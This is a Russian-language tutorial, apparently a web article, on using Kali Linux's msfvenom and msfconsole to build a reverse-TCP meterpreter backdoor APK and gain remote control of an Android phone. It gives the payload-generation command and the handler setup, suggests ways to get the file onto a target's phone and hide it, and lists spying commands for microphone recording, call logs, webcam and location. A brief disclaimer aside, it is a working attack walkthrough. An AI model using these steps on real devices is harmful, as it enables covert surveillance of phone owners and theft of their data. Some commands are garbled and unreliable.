Как получить доступ к телефону Android с помощью Kali Linux
Смартфон Android часто является шлюзом для большинства коммерческих IoT-гаджетов. Управление сигнализацией Nest Smoke осуществляется через соответствующее приложение для Android. Так же как и термостат Nest для контроля температуры. Умные замки, камеры дверных звонков — доступ почти ко всем интеллектуальным устройствам можно получить через Alexa или другие основные приложения. Что, если кто-то получит удаленный доступ к такому телефону Android? Вы думаете, это невозможно? Для этого мы дадим базовую демонстрацию того, как можно использовать «метасплоит» Kali Linux для создания бэкдора на вашем телефоне Android.
Примечание. Это руководство предназначено для исследователей безопасности и любителей. Мы не рекомендуем взламывать чей-либо телефон без его разрешения.
Фон
Прежде чем приступить к работе над Kali Linux, вам сначала необходимо ознакомиться с его консольным терминалом.
Он легко содержит полный список инструментов, предназначенных для работы с прошивкой или операционной системой устройства.
Здесь мы будем использовать один из распространенных инструментов под названием «MSFVenom», чтобы внедрить вирус в телефон Android. Он генерирует несколько видов полезных данных на основе выбранных пользователем параметров. Эксплойт работает на многих платформах, включая Windows, Android, OpenBSD, Solaris, JAVA, PHP и игровое оборудование.
Запуск Android Metasploit
Следующие шаги продемонстрируют, как загрузить MSFVenom в системе Kali Linux.
Запустите терминал и введите следующую команду.
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > /root/LOCATION/hackand.apk
Здесь полезная нагрузка запускается с использованием расширения Exploit под названием «Meterpreter».
Чтобы определить IP-адрес хоста-прослушивателя, откройте новый консольный терминал и введите ifconfig
. Обычно порт 4444 назначается для троянов, эксплойтов и вирусов.
После определения IP-адреса вернитесь к предыдущему экрану и введите данные.
Файл «hackand.apk» будет сохранен на рабочем столе и является основным бэкдором, который можно использовать на телефоне Android.
На следующем этапе запустите «msfconsole», который является распространенным инструментом тестирования на проникновение, используемым в Kali Linux. Для этого введите service postgresql start
, а затем msfconsole
. PostgreSQL относится к базе данных, в которой хранится консоль.
Как только инструмент проникновения будет готов, вы сможете запустить оставшийся эксплойт.
Далее будет использоваться исполняемый файл под названием «мульти-обработчик».
use multi/handler
Обратитесь к изображению ниже, чтобы узнать, как подключить эксплойт к консоли. Будут использоваться тот же IP-адрес и номера портов.
На следующем этапе эксплойт msfvenom будет запущен и инициализирован простой командой exploit
. Теперь нам нужно найти цель, которой будет телефон Android.
Подключение терминала Kali Linux к телефону Android
Размер файла hackand.apk, который мы скачали ранее, составляет всего 10 КБ. Вам придется найти способ вставить файл в телефон цели. Вы можете передать вирус с помощью USB-накопителя или службы временной электронной почты.
Обычно провайдеры веб-почты, такие как Gmail или Yahoo, отказываются переносить этот зараженный вирусом файл.
Android предупредит вас перед установкой программного обеспечения. Но для завершения установки потребуется менее 20 секунд, поскольку вам нужно всего лишь «игнорировать риск и установить». Это делает угрозу несколько серьезной, если ваш телефон находится в режиме разблокировки.
Как показано здесь, телефону можно нанести большой ущерб, включая изменение содержимого памяти, прекращение перехода телефона в спящий режим, подключение и отключение от Wi-Fi, установку обоев и многое другое.
После установки APK-файла его можно хитро замаскировать внутри телефона.
Теперь вы можете использовать множество команд, подобных приведенным ниже, на терминале Kali Linux для управления телефоном. Вам не обязательно их запоминать, поскольку список доступен из простой опции help
в meterpreter
.
record_mic
: запись микрофонасбросить журнал вызовов
: получить журнал вызововwebcam_chat
: начать видеочат.geocate
: узнать текущее местоположение телефона.
Большинство современных телефонов Android предотвратят установку этого вредоносного приложения. Таким образом, этот эксплойт обычно работает со старыми моделями Android.
Также читайте: 14 лучших хакерских приложений для Android
Мысли
В этом уроке мы рассмотрели базовую стратегию использования Kali Linux для получения доступа к смартфону Android. Несмотря на то, что это очень простой эксплойт, он имеет большое значение с точки зрения безопасности Интернета вещей.
Что вы думаете об эксплойтах Kali Linux? Будете ли вы более осторожно относиться к безопасности своего телефона? Дайте нам знать в комментариях.